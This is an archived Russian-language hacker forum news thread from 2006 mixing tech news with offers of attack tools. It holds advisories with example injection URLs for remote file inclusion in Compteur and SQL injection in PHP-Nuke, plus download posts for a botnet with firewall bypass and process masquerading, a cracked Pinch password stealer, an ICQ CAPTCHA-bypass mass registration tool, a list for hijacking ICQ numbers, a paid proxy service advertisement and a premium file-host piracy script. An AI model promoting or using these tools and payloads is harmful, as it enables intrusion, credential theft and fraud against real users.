Архив новостей (2004-2015 год)

Статус
Закрыто для дальнейших ответов.
Отслеживать
Compteur - php including
Дата Выпуска: 2006-10-11
Уровень: Высоко критический
Решение: Неисправленно
Программное обеспечение: Compteur 2.x

Описание:
Входящие данные в параметрах "folder" в param_editor.php, и "cp" в compteur.phpдолжным образом не проверяются при инклуде локальных файлов.
Уязвимость позволяет заинклудить внешний скрипт.
Пример:
Код: 
Http://www.site.com/param_editor.php?folder=URL
Http://www.site.com/counter.php?cp=URL
Источник: secunia.com
 
Охота на хакера - запись с первого канала
http://news.xss.pro/hack_hunt.jpg
Недавно ночью по ОРТ (или как его модно называть "первый канал") показывали документальный фильм "Охота на хакера". Фильм повествует о хакерах на бытовом уровне (ну как всегда рассказывают завирально-фантастические истории про то что у хакера есть супервирусы итд итп. Евгеша Касперский пугает историями про трояны класса бэкдор (с). Показывают чувака, который попался на халявном иннете, как у него забирают комп. Вообщем смотите сами - 173 метра.[New$paN]
:zns5: Скачать|Download
 
Сейчас не для кого не секрет что если у вас есть пароль от 5 значного уина, то это ещё не значит что этот номер является безопасным, так как имеется возможность привязки этого пятизнака к почте на сервисах сотрудничающих с ICQ. Для удобства проверки безопасности пятизнаков Superfly, так же известный как elite создал создал список всех локализованных и невидимых пятерок.

:zns5: Скачать|Download
Источник: http://zloy.org
 
Underwater UIN Autoregger
uaamd7.png

Недавно был найден баг,позволябщий регать icq номера,не подписывая текст с картинки.Баг обнаружил C001_UsEr. Программу, автоматизирующую процесс написал gemaglab1n.
Для рега нужны прокси. Нужно,чтобы они скрывали айпи. Максимум пять уинов с одной прокси.
Также нам понадобится mail аккаунт. Идем на freshmail.zoznam.sk/register и регистрируемся ( в поле мобильник введите чтото типа 123456789 ).Запомните поля Meno (мыло), Priezvisko (фамилия) и Heslo (пасс).
Введите их потом в програму в соответствующие поля,укажите путь к проксиям и ждите результата.
Красивые уины вида x,xy,xyz отбрасываются в отдельный файл.
Пасс на icq = то что вы ввели в поле heslo.
Процесс реги трудный и разобраться будет нелегко но я уверен вы сможете )

Meno - mail вида dggwgw
Login - вида dasfsdf@zoman.sk ( с доменом )
Priezvisko - фамилия.
Закачка далее>>>[New$paN]
 
Cyber Bot v1.1 Beta
Релиз от наших партнеров - команды CyberLords - Cyber Bot. Является неплохим ботом с php админкой. Требует MySQL.
Фичи:
1. обход всех фаеров
2. работа от имени svchost.exe, lsass.exe или любого другого процесса
3. загрузка файлов на компьютер по http:// и ftp://
4. запуск exe файлов
5. возможность обновления бота более новой версией
6. бот получает новые команды только один раз, то есть если боту передать команду на скачивание (get http://test.ru/file.exe) то он скачает этот файл только один раз (а не при каждом заходе бота) и будет ждать новых команд
7. добавленна работа бота под ограниченными правами user или гостя[New$paN]
:zns5: Скачать|Download
 
12 октября проект LJ Talk вышел из стали бета тестирования и приобрел официальный статус. Пользователи Живого Журнала узнали об этом по появлению в своем профайле нового поля LJ Talk

Но самое интересное, что в качестве основного клиента для LJ Talk был представлен хорошо известный проект Gizmo точнее его модификация - Gizmo Project for LJ Talk. Напомню, что Gizmo часто называют «первой жизнеспособной альтернативой Skype». Но несмотря на использование открытых протоколов (SIP), Gizmo Project так и не смог добиться такой же популярности, как Skype. Теперь, с появлением Gizmo Project for LJ Talk многомиллионные ряды пользователей LiveJournal автоматически получили доступ ко всем сервисам проекта Gizmo, что может очень сильно укрепить его позиции на рынке IP-терефонии.
Gizmo_Project_for_LJ_Talk.gif


Каждый пользователь LiveJournal получил аккаунт вида username@livejournal.com. В контактлисте LJ Talk уже находятся все взаимные друзья. На счету Call Out (аналог SkypeOut) уже находится $0.25.

Пользователи Gizmo Project for LJ Talk получат следующие возможности:
- текстовые сообщения между пользователями LJ Talk, Gizmo Project и другими Jabber клиентами, включая Google Talk
- бесплатные голосовые звонки по протоколу SIP между пользователями Gizmo/LJ Talk, Gizmo Project и других SIP сетей
- недорогие звонки на стационарные и мобильные телефоны по всему миру по тарифам Gizmo Project
- возможность показа реального статуса в сети – Presence
- модерируемые конференции для нескольких участников
- кнопки "Call Me" и "IM" в профайле LiveJournal – click-to-call
- другие возможности доступные пользователям Gizmo Project

Доступны версии Gizmo Project for LJ Talk для Windows и MacOS

К сожалению, пока отсутствует русскоязычная версия. Для входа в систему используете свой LJ username и пароль.

Источник: http://www.skypeclub.ru/
 
AntiXak by ZaCo
Интересная система для защиты сайта от багов от нашего партнера - ZaCo. Система устроена наподобие нашей, ту что писал Great. Все что надо сделать - отконфигурировать и приинклюдить ее к вашим скриптам.
Код: 
$parfile='file.php';
require_once('antixak/antixak.php');
где parfile - неполное имя текущего скрипта.
:zns5: Скачать|Download[New$paN]
 
Учебный курс - "Администратор безопасности сети" от DigitalSecurity
http://news.xss.pro/adm_sec_lan.gif
Курс "Администратор безопасности сети" разработан экспертами по информационной безопасности компании "Digital Security" на основе многолетнего опыта работы в данной области.
Материалы курса предназначены для специалистов в области информационных технологий, сетевых администраторов, специалистов по безопасности, IT-менеджеров - всех тех, кто по роду своей деятельности связан с вопросами информационной безопасности.
Курс содержит: справочный, теоретический материалы, типовые практические решения по безопасности. Курс немного староват, выполнен в виде проекта CD диска (хотя можно и так запустить).[New$paN]
:zns5: Скачать|Download
Выражается благодарность мемберу форума по имени DinamiC за выкачивание образа из Украинского сегмента интернета.
 
Акция: заливаем книги на наш ФТП
Книг в сети много, всегда хочется знать больше, но лимиты на закачку с фаилхостингов, вечный геморой с докачкой, большие файлы, неизвестные пароли дают о себе знать. Конечно это очень раздражает. Однако со всем этим покончено! Нужно отблагодарить NoName за предоставленный FTP на который мы и будем складывать нужную и актуальную литературу.
На первых порах мы предоставляем Вам возможность "Заказать" книги на заливку. Внимательно прочитайте пост до конца, чтобы не возникало вопросов.

Итак, Ваша просьба должна выглядеть так:
  • Название книги + автор(если известен)
  • Тема на форуме или линки на закачку с файловых хостингов или других ФТП. ВНИМАНИЕ, тема по поиску литературы СОСЕДНЯЯ. Линки на закачку ОБЯЗАТЕЛЬНЫ.
  • Размер файла (опционально)
  • Линк на тему для публикации, чтобы нам было легко выложить книгу в паблик. например если книга по PHP - линк на тему про книги по php.
Бесполезно просить:
  • Неконкретные книги (что-нибудь по HTML и пр.)
  • Книги некомпьютерной тематики (Дарья Донцова, газета АИФ и пр)
  • Книги без линков на закачку
[New$paN]
Все файлы будут сложены на наш ФТП сервак, главное не порвите его.
:zns3: Пароль на закачку ВСЕХ файлов: xss.pro/
Возможно мы его сменим или уберем, если не подойдет - читайте этот пост.

З.Ы: сроки залития нами книг не регулируются, любому может быть отказано в залитии книги.
 
Wi-фу боевые приемы взлома и защиты беспроводных сетей
http://news.xss.pro/wi-fu.jpg
Книга посвящена методам проведения атак на беспроводные сети Wi-Fi и защите от таких атак. Авторы - широко известные в мире аудиторы безопасности беспроводных сетей, владеющие обширным практическим опытом в рассматриваемых вопросах.
Обсуждается подбор аппаратных и программных средств для атаки и защиты. Приводится пошаговое описание атак. Исследуются потенциальные слабости применяемых в настоящее время и разрабатываемых протоколов безопасности, включая 802.11i, PPTP и IPSec. Описываются системы обнаружения вторжений. Имеется обширный материал по прикладной криптографии, в том числе по основным алгоритмам шифрования, написанный языком, понятным практикующему программисту, не имеющему солидной математической подготовки.
Рассмотрение проводится преимущественно на примерах программных средств с открытыми исходными текстами, хотя уделяется внимание и коммерческим продуктам.
Книга представляет несомненный интерес для системных и сетевых администраторов, желающих защитить свою беспроводную сеть от непрошеных гостей. Много полезного найдет в ней и хакер, ищущий способ проникнуть в чужую сеть, а также любитель, интересующийся новыми технологиями.[New$paN]
:zns5: Скачать|Download с нашего FTP
:zns3: Пароль в подписи
 
VPNClient
installwhirlmm5.png
Пакет программ с открытым исходным кодом для создания криптографически защищённого туннеля c использованием каналов связи общего пользования (Internet) между компьютером пользователя и сервером VPN. Пакет распространяется в соответствии с лицензией GPL. Исходные тексты представлены отдельно. Руководство по установке и настройке прилагается.

В состав данного инсталляционного пакета включены демонстрационный 4096-битный сертификат X.509 и соответствующий ему ключ пользователя, а также файл конфигурации для создания тестового подключения к VPN серверу.

В настоящее время услуга доступа к VPN серверу в целях тестирования предоставляется бесплатно.
ВЫ МОЖЕТЕ СОЗДАТЬ ТЕСТОВОЕ ПОДКЛЮЧЕНИЕ СРАЗУ ПО ЗАВЕРШЕНИИ РАБОТЫ ИНСТАЛЛЯТОРА!
СРОК ТЕСТОВОГО ПОДКЛЮЧЕНИЯ ПОКА НИКАК НЕ ОГРАНИЧЕН, ТАК ЖЕ, КАК И ОБЪЁМ ТРАФИКА!
В тестовой конфигурации сертификат и ключ одинаковы для всех клиентов.
Для того, чтобы перенаправить трафик через туннель VPN, используйте в настройках приложений следующие характеристики прокси-серверов:
HTTP/HTTPS 10.0.0.1:3128
SOCKS4/5 10.0.0.1:1080
Подробнее о настройках популярных программ рассказано в документации на сайте:
Руководство по установке и настройке VPNClient
Инсталляционный пакет содержит графическую оболочку, драйвер виртуального сетевого адаптера, бакэнд-приложение ОpenVPN.exe для работы с виртуальным сетевым адаптером, а также набор вспомогательных средств и утилит.
:zns5: Исходный текст программы VPNClientGUI (Архив, ZIP), ТЕКУЩАЯ ВЕРСИЯ
:zns5: ТЕКУЩАЯ ВЕРСИЯ инсталляционного пакета VPNClient (исполняемый модуль, EXE, для ОС 2K/XP/2K3)
:zns5: Документация по настройка программы VPNClient на работу через прокси
:zns5: Документация по установке и настройке пакета программ VPNClient
 
Д. Н. Колисниченко - Самоучитель PHP5
http://news.xss.pro/php5samouch.jpg
Данная книга является превосходным учебным пособием, позволяющим быстро освоить и эффективно использовать РНР. Здесь вы найдете все, что для этого необходимо: от описания настройки РНР, основ CGI и базовых конструкций языка, до работы с сессиями, каналами, сокетами и другими специальными технологиями РНР. Особое место занимает рассмотрение взаимодействия РНР с базами данных. В книге рассмотрены, как MySQL, так и SQLite, поддерживаемая РНР 5. При всем при этом, книга максимально ориентирована на достижение реальных практических результатов. В деталях описано, как создать на РНР свою гостевую книгу, чат, форум, почтовую рассылку на сайте, новостную ленту и даже Интернет-магазин. Приведены готовые скрипты. Отдельно рассмотрена методика создания системы автоматического управления содержимым сайта («движка»). Такая система позволит вам максимально упростить поддержку и обновление своего сайта. Кроме создания своих скриптов, приведено описание профессиональных продуктов (бесплатных и открытых): форума РНРВВ и системы PHP-Nuke. Эти продукты применяются на огромном количестве сайтов и позволяют «дважды не изобретать велосипед», а использовать уже готовые решения. Книга отличается простотой и ясностью изложения материала. Написана опытным и известным автором. Лучший выбор для начинающих изучать РНР.[New$paN]
 
Pinch 2.60 cracked by \xE9\x85\
http://news.xss.pro/p2pro.gif
Думаю, что такое пинч никому рассказывать не нужно. Кто такой \xE9\x85\ тоже говорить думаю не надо. А если интересно - загляните в список администрации портала. Ну так вот, наш модер \xE9\x85\ крякнул пинч версии 2.60. В архиве все вамое интересное и вкусное. Все нормально работает. Ну что к чему написано внутри, в ридми. Думаю разберетесь. Закачка далее>>>[New$paN]
:zns5: Скачать|Download
:zns3: Пароль на запуск программы: xss.pro/
 
fc6loginbd0.jpg
Вышла долгожданная полная версия Fedora Core 6 дата официального выпуска 2006-10-24. Напомним кратко что такое Linux Fedora Core ? Дистрибутив предназначен на тех, кто любит работать с новыми выпусками программ. Изменения, предназначенные для Red Hat Enterprise Linux сначала проходят обкат в данном дистрибутиве. По лицензионным соображениям отсутствиет поддержка mp3 и DivX. Тем не менее, существует достаточное количество дополнительных репозиториев, устраняющих данное неудобство и содержащих большое число дополнительных программ. Дистрибутив пользуется популярностью среди пользователей. Одновременно поддерживаются 2 последних дистрибутива.
Качаем далее
:zns5: [New$paN]

Fedora Core 6 Full DVD ISO 3.3 Gb

Fedora Core 6 Full на (5CD)

22 скриншота пошаговая установка Fedora Core 6 3.1Mb
 
САЙТ СЕРВИСА: http://5socks.net/
--
SUPPORT & DEMO ACCOUNTS BY ICQ: 990100 or 555019
-------------------------------------------------------------------------------------
TERMS OF SERVICE И ОСОБЕННОСТИ НАШИХ НОВЫХ ТАРИФОВ ВЫ МОЖЕТЕ ПОСМОТРЕТЬ НА НАШЕМ САЙТЕ: http://5socks.net/
-------------------------------------------------------------------------------------

ОСНОВНЫЕ ОСОБЕННОСТИ:
1) ВСЕ прокси в базе проверяются каждые 5 минут !
В связи с этим 99% всех прокси серверов, которые вы увидите в базе - рабочие!
2) В нашей супер комфортабельной админке имеется поиск по странам,штатам,городам,скорости подключения,времени онлайн,домену.
3) Автоматическая оплата по Webmoney не выходя из админки. Возможен также мануальный прием средств по : Webmoney, Egold
4) Свыше 3000+ соксов онлайн ежедневно, огромный выбор US штатов.
5) Пополнение базы соксов ежедневно.
6) Гибкие тарифы и автоматическая система скидок.
7) Если у вас нету денег на оплату сервиса на месяц прошу в ICQ, цена одного сокса с выборкой 0.50$.
----------
В случае возникновения проблем связанных с выбором тарифных планов прошу в аси указанные выше....
А наша программа "Proxy Helper" для работы с нашим сервисом не оставит вас равнодушным!
Так же внутри вас ждет множество приятных мелочей, при наличии которых работать становится удобнее и приятнее.
Аналогов нет![New$paN]
 
Обновился IBRapiDL
http://news.xss.pro/ibrapidl.gif
Все помнят наш уникальный бесплатный сервис IBrapiDL. Для тех кто не помнит - напомню: скрипт позоляет генерировать прямые ссылки для рапиды с использованием премиум акка (встроеного в скрипт) и с возможностью докачки. ну так вот, недавно рапида переехала на новые серваки, новый домен с новыми возможностями - rapidshare.com.
Ну так вот, обновление сервиса заключается в появлении возможности получения линков с rapidshare.com.
Напомню, что чтобы иметь возможность юзать IBrapiDL необходимо иметь доступ в раздел ХАЛЯВА и иметь 100 полезных сообщений на форуме. Лимитации вызваны ограничением колличества скачиваемой информации в сутки на файловом хранилище. Юзайте наздоровье.[New$paN]
 
Коллекция Cheat Sheets Round Up: Ajax, Css, LaTeX, Ruby — список полезных "шпаргалок" для веб–разработчиков.

ActionScript , Ajax , Apache , C# and VB.NET , PHP и куча другого..



также вот ещё шпаргалки
(кстати этот сайт уже был уже на ДЛ.. я сам про него постил)
 
Модификация "репутация-спасибо"
http://news.xss.pro/thanksmod.gif
У нас на форуме добавлена интересная фича - репутация-спасибо. Это не совсем репутация и не совсем стандартный мод "Спасибо". Вообщем смысл в следующем:
Вам понравился пост. В нем есть полезная Вам информация или еще что. Вы жмете под ним (там где кнопки цитаты, редактирование и пр. - думаю все нашли), пишите причину. Юзеру, отписавшему полезную инфу добавляется 1 очко в новую шкалу под аватаром:
Благодарности: 1
При нажатии на цифру "1" (колличество очков) открывается попап в котором содержится инфа о том, в какой теме, когда, кем и за что поставлено "Спасибо".
Убедительно прошу не тестировать где попало и на чем попало. Если хотите попробовать - пробуйте на этом посте ;)
На использование репутации действуют лимиты: необходимо иметь 30 полезных сообщений на форуме и обитать тут больше 7 дней, точнее 604800 секкунд.
В случае обнаружения махинаций с репутацией - последуют штрафные санкции.
З.Ы: Увижу еще один раз "Спасибо" в виде поста - забаню нахрен.[New$paN]
З.З.Ы: можете пробежаться по форуму и поблагодарить тех, кого должны.
 
PHP-Nuke - SQL Injection
Дата Выпуска: 2006-11-01
Уровень: Умеренно критический
Решение: Неисправленно
Software: PHP-Nuke 7.x

Описание:
Входящие данные в параметре "forwhat" в modules/journal/search.php, должным образом не проверяются, перед использованием в SQL запросе. Уязвимость может эксплуатироваться, чтобы управлять SQL, запросами, вводя произвольный код SQL.

Пример:
Код: 
http://www.site.com/modules/journal/search.php?forwhat=CODE
Источник: secunia.com
 
fichi.png


Возможности:
- Поддержка скинов. Темы от Windows ХР и от Style XP.
- Получение (автопоиск) фотографий и аватар пользователей ICQ с сервера с сохранением и поиском по ним.
- Просмотр рейтинга icq и aim пользователей.
- Генерация паролей из 8 символов.
- Создание шифрованых сообщений.
- Создание небольших шифрованых файлов с передачей их через чат.
- Стилизатор сообщений и разбор слова на пирамиду.
- Работа с веб сервисами ICQ.
- Проверка веб статуса контакта (ICQ и AIM).
- Проверка на "Игнор". Проверка статуса контакта не добавляя его в Контакт лист.
- Удаление себя из его Контакт листа.
- Статус "Непоседа". Смена через интервал видим / невидим.
- Конференция (до трех ICQ номеров) и простой чат.
- Создание вертикальных сообщений, сообщений с дополнительными символами между букв, сообщений произвольной формы.
- Установка флага День рождения с шариком.
- Режим "Информатор". Доступ к вашей базе данных через ICQ или автоответ сообщением на входящие сообщения (автоматически выставляется статус webaware).
- Создание Фэйк UIN с заданным числом умножений (автоматический дефэйк).
- Работа через прокси.
- Регистрация новых UIN через протокол ICQ (автозапись результатов в файл "good.txt").
- Получение аватар с AIM аккаунтов.
- Пересылка входящих сообщений на указанный ICQ UIN.
- Регистрация новых UIN через Rambler с использованием списка прокси.
- Получение расширенного контакт листа с сервера (показывает до 200 контактов которые лежат в нулевой папке вашего UIN) и сохранение в файл всех контактов из него (правой клавишей на списке контактов для вызова меню). В меню доступно: посмотреть инфу контакта, проверить его на невидимость, удалить себя из его КЛ, открыть с ним чат, удалить его из КЛ. (смотреть закладку "Валид").
- Подключение к серверу ICQ через wap шлюз (обходит запрет на использовании icq на прокси и фаерволах, также полезно для оживления зафлуженных uinов. Команды управления пишутся в командной строке. (смотреть закладку "WICQ").
- Поиск пользователей в сети ICQ по параметрам и сохранение результатов поиска в файл (файл "uins.txt" запись при нажатии на кнопку "Валидировать") без дубликатов. Добавление в контакт лист на сервере найденных пользователей. (смотреть закладку "Валид").

:zns5: ICQ tools 2006 (cкачать архив)
:zns5: Скины (скачать архив)
 
Статус
Закрыто для дальнейших ответов.
Верх